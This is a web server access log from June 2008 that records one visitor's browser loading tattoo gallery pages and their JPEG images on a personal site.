65.35.108.157 - - [17/Jun/2008:21:54:27 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
65.35.108.157 - - [17/Jun/2008:21:54:28 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
65.35.108.157 - - [17/Jun/2008:21:54:28 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
65.35.108.157 - - [17/Jun/2008:21:54:28 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
65.35.108.157 - - [17/Jun/2008:21:54:28 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
65.35.108.157 - - [17/Jun/2008:21:54:28 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
65.35.108.157 - - [17/Jun/2008:21:54:28 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
65.35.108.157 - - [17/Jun/2008:21:54:28 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
65.35.108.157 - - [17/Jun/2008:21:54:28 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
65.35.108.157 - - [17/Jun/2008:21:54:36 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
65.35.108.157 - - [17/Jun/2008:21:54:36 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
65.35.108.157 - - [17/Jun/2008:21:54:36 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
65.35.108.157 - - [17/Jun/2008:21:54:36 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
